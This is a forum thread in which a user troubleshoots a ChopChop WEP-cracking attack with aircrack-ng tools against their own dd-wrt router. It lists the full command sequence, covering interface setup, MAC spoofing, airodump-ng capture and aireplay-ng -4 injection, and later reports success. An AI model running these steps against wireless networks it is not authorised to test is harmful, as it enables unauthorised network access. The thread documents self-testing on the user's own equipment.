Results 1 to 3 of 3

Thread: ChopChop WEP attack with IPW2200

  1. #1
    Just burned his ISO
    Join Date
    Dec 2007

    Default ChopChop WEP attack with IPW2200

    Hi all, hoping you guys can point me in the right direction. I have been successful searching the forums, but I realized that I often know what to type but not WHY I'm typing it. I have just recently begun to explore the recommended Slax guides also.

    I am "attacking" from a dell laptop with an Intel 2200BG (yuck, I know). I managed to successfully dual boot BT2 with XP pro.

    The target is my linksys wrt54g v2 running dd-wrt firmware (128bit key WEP). My wife's desktop is connected to the linksys to serve as the client.

    Here's my process so far (using aircrack 0.9.1 if it matters):

    rmmod ipw2200
    modprobe ipw2200 rtap_iface=1
    ifconfig eth1 up
    ifconfig rtap0 up
    #I think this creates rtap0 that I need to inject and listen. I also have no internet access until I do this. Why?

    ifconfig eth1 up hw ether 00:11:22:33:44:55
    #changes my MAC? Not really necessary (I don't yet Mac filter).

    iwconfig eth1 essid <AP essid> channel <AP channel> key s:fakekey mode managed
    #what does this accomplish?

    airodump-ng --bssid <AP MAC> -w <dump file> rtap0
    #begins listening with rtap0? The packet count begins climibing, but the data (IVs) stay very low (but I think this is normal with little/no traffic)

    aireplay-ng -4 -a <AP MAC> -h <My "fake" MAC> -i rtap0 eth1
    #begins reading packets (into the thousands).

    This is where I get stuck. Isn't it supposed to eventually stop reading packets and ask if I want to "use this packet" (y or n)? I got it to do this once and continued on with packetforge -0 and aireplay -2 (IVs went soaring)!!!

    Any insight as to what I am doing wrong?


  2. #2
    Developer balding_parrot's Avatar
    Join Date
    May 2007


    If you read all these pages you will find that all of the commands are explained to an extent, and you should be able to see why the commands are strung together the way they are.

  3. #3
    Just burned his ISO
    Join Date
    Dec 2007


    thanks for the direction. I managed to succesfully and repeatedly crack my wep with both -3 and -4 attacks this evening. Alot of my confusion stemmed from the 2200BG. I straightened out which interface should be listening, which should be sending, proper modes, etc and it began working.

    Time to keep reading. Thanks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts